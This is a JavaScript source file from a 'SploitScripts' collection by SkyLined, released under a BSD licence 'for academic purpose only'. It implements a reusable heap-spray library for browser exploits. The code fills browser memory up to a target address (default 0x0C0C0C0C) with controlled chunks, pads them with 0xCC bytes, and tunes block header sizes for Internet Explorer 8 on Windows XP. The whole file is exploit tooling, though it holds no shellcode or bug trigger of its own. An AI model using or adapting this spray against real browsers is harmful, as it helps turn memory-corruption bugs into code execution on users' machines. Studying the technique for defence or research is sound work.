/*SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS
                                                                                                                        
   ,dSSSSSSSSSSSS  SSSS    ,dSSY'  SSSS      SSSS  SSSS          SSSS  SSSSb,    SSSS  ,dSSSSSSSSSSSS  SSSSSSSSSSSSb,   
   SSSS            SSSS  ,dSSY'    SSSS      SSSS  SSSS          SSSS  SSSSSSb,  SSSS  SSSS            SSSS      SSSS   
   'YSSSSSSSSSSb,  SSSSSSSSSSSSb,  'YSSSSSSSSSSSS  SSSS          SSSS  SSSS'YSSb,SSSS  SSSSSSSSSSS     SSSS      SSSS   
             SSSS  SSSS      SSSS            SSSS  SSSS          SSSS  SSSS  'YSSSSSS  SSSS            SSSS      SSSS   
   SSSSSSSSSSSSP'  SSSS      SSSS  SSSSSSSSSSSSP'  'YSSSSSSSSSS  SSSS  SSSS    'YSSSS  'YSSSSSSSSSSSS  SSSS  SSSSSSP'   
                                                                                                                        
SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS
                                                                                                                        
 SploitScripts/HeapSpray 10.9 - An implementation of a "heap spray" for browser exploits.                               
 Copyright (c) 2002-2010 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>                                         
 All rights reserved. This information is provided for academic purpose only.                                           
                                                                                                                        
 Redistribution and use in source and binary forms, with or without modification, are permitted provided that the       
 following conditions are met:                                                                                          
    * Redistributions of source code must retain the above copyright notice, this list of conditions and the following  
      disclaimer.                                                                                                       
    * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the         
      following disclaimer in the documentation and/or other materials provided with the distribution.                  
    * Neither the name of the copyright holder nor the names of the contributors may be used to endorse or promote      
      products derived from this software without specific prior written permission.                                    
                                                                                                                        
 THIS SOFTWARE IS PROVIDED ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED  
 WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT     
 HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES    
 (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR         
 BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT   
 (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE         
 POSSIBILITY OF SUCH DAMAGE.                                                                                            
                                                                                                                        
SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS*/

function HeapData(xArg) {
  // Class that represents data to be stored in a HeapChunk at a specified offset. If xArgs is a unicode string, the
  // string is the data to be stored and the size of the data is the length of the string. If xArgs is a number, that
  // number will be the size of the data and the data will consist of '\xCC' bytes.
  // setData(uData) can be used to modify the data after creating the object.
  var iSize, sData;
  if (typeof(xArg) == "number") {
    this.iSize = xArg;
    if (iSize % 2) throw new Error("HeapData size must be WORD aligned");
    this._uData = strDup(this.iSize >> 1, "\uCCCC");
  } else {
    this._uData = "" + xArg;
    this.iSize = this._uData.length * 2;
  }
  if (this.iSize / 2 != this._uData.length)
      throw new Error("Sanity check failed: heap data size is " + this.iSize.toString(16) + 
      " but length of string is " + this._uData.length.toString(16) + "!?");
  this._iOffset = null;
  this.getOffset = function () {
    if (this._iOffset == null) throw new Error("HeapData offset must be set before it can be read");
    return this._iOffset;
  }
  this.setOffset = function (iOffset) {
    if (this._iOffset != null) throw new Error("HeapData offset can only be set once");
    this._iOffset = iOffset;
  }
  this.setData = function (uData) {
    if (uData.length * 2 != this.iSize) throw new Error("HeapData size must be " + this.iSize);
    this._uData = uData;
  }
  this.toString = function () {
    return this._uData;
  }
}

function HeapChunk(iTargetAddress, iChunkSize, iPageSize) {
  // Class that represents a heap chunk of iSize to be used by a heap spray that sprays up to iTargetAddress.
  // Each heap chunk consists of several pages and should be equal in size to the allocation granularity of the os
  // so it gets alligned properly. The heap spray will create a block consisting of several chunks.
  // You do not need to create an instance of this class - the Heap Spray will do that.
  this.iTargetAddress = iTargetAddress;
  this.iSize = iChunkSize;
  this.aoData = [];
  this.iOffset = iTargetAddress % this.iSize;
  this.iBaseAddress = iTargetAddress - this.iOffset;

  var uPageHeader = asciiUnicode("<PAGE>");
  var uPageFooter = asciiUnicode("</PAGE>");
  var uChunkHeader = asciiUnicode("<CHUNK>");
  var uChunkFooter = asciiUnicode("</CHUNK>");
  var iPageHeaderSize = uPageHeader.length * 2;
  var iPageFooterSize = uPageFooter.length * 2;
  var iChunkHeaderSize = uChunkHeader.length * 2;
  var iChunkFooterSize = uChunkFooter.length * 2;

  this.addData = function (xArg) {
    // Convenience; no need to wrap in a HeapData object unles you want to.
    if (typeof(xArg) === "object" && xArg.constructor === HeapData) {
      var oHeapData = xArg;
    } else {
      var oHeapData = new HeapData(xArg);
    }
    if (this.iOffset + oHeapData.iSize > this.iSize - this.iChunkFooterSize) 
        throw new Error("Adding " + oHeapData.iSize + " bytes at offset " + this.iOffset + " would overflow heap chunk");
    oHeapData.setOffset(this.iOffset);
    this.aoData.push(oHeapData);
    this.iOffset += oHeapData.iSize;
    return this.iBaseAddress + oHeapData.getOffset();
  }
  this.toString = function () {
    var uPage = "\u4848"; // "H" for heap
    while (uPage.length * 2 < iPageSize) uPage += uPage;
    uPage = uPageHeader + uPage.substring(iPageHeaderSize / 2, (iPageSize - iPageFooterSize) / 2 ) + uPageFooter;
    var uChunk = uPage;
    while (uChunk.length * 2 < iChunkSize) uChunk += uChunk;
    uChunk = uChunkHeader + uChunk.substring(iChunkHeaderSize / 2, (iChunkSize - iChunkFooterSize) / 2 ) + uChunkFooter;
    for (var i = 0; i < this.aoData.length; i++) {
      var oHeapData = this.aoData[i];
      var iStartIndex = oHeapData.getOffset() / 2;
      var iEndIndex = iStartIndex + oHeapData.iSize / 2;
      uChunk = uChunk.substr(0, iStartIndex) + oHeapData.toString() + uChunk.substr(iEndIndex);
    }
    if (uChunk.length * 2 != this.iSize) throw new Error("Sanity check failed: chunk size is " + 
        (uChunk.length * 2).toString(16) + " instead of expected " + this.iSize.toString(16) + "!?");
    return uChunk;
  }
}
function HeapSpray(iTargetAddress, iChunkSize, iPageSize) {
  // Class that represents a heap spray that uses pages of iSize to spray the heap up to iTargetAddress.
  // Use oHeapSpray.oPage.addData(...) to add data.
  // Use oHeapSpray.spray() to spray the heap after setting up the data in the page.
  iTargetAddress = iTargetAddress || 0x0C0C0C0C;
  iChunkSize = iChunkSize || 0x10000;
  iPageSize = iPageSize || 0x1000;
  if (this.iTargetAddress & 0x3 > 0) throw new Error("Target address must be DWORD aligned");
  this.iTargetAddress = iTargetAddress;
  this.iChunkSize = iChunkSize;
  this.iPagesPerChunk = iChunkSize / iPageSize;
  this.iPageSize = iPageSize;
  this.iChunksPerBlock = 0x40;
  this.iBlockSize = this.iChunksPerBlock * iChunkSize;

  var uBlockHeader = asciiUnicode("<BLOCK>");
  var uBlockFooter = asciiUnicode("</BLOCK>");
  this.iBrowserBlockHeaderSize = navigator.userAgent.indexOf("MSIE 8.0; Windows NT 5.1;") == -1 ? 0x24 : 0x44;
  this.iBrowserBlockFooterSize = 0x2;
  var iBlockHeaderSize = this.iBrowserBlockHeaderSize + uBlockHeader.length * 2;
  var iBlockFooterSize = this.iBrowserBlockFooterSize + uBlockFooter.length * 2;
  this.iHeapStartAddress = 0x01000000;

  var oChunk = new HeapChunk(iTargetAddress, iChunkSize, iPageSize);
  if (oChunk.iOffset < iBlockHeaderSize) throw new Error("Target address may be inside heap block header!");

  this.addData = function (oHeapData) {
    return oChunk.addData(oHeapData);
  }
  this.auHeap = [];
  this.spray = function () {
    var uBlockTemplate = strDup(this.iChunksPerBlock, oChunk.toString());
    var iRequiredSize = iTargetAddress - this.iHeapStartAddress;
    var iBlocksCount = Math.ceil(iRequiredSize / this.iBlockSize);
    var iStartIndex = iBlockHeaderSize / 2;
    var iEndIndex = uBlockTemplate.length - iBlockFooterSize / 2;
    for (var i = 0; i < iBlocksCount; i++) {
      var uBlock = uBlockHeader + uBlockTemplate.substring(iStartIndex, iEndIndex) + uBlockFooter;
      this.auHeap.push(uBlock);
      if (uBlock.length * 2 + this.iBrowserBlockHeaderSize + this.iBrowserBlockFooterSize != this.iBlockSize)
          throw new Error("Sanity check failed: block size incorrect!?");
    };
  }
}
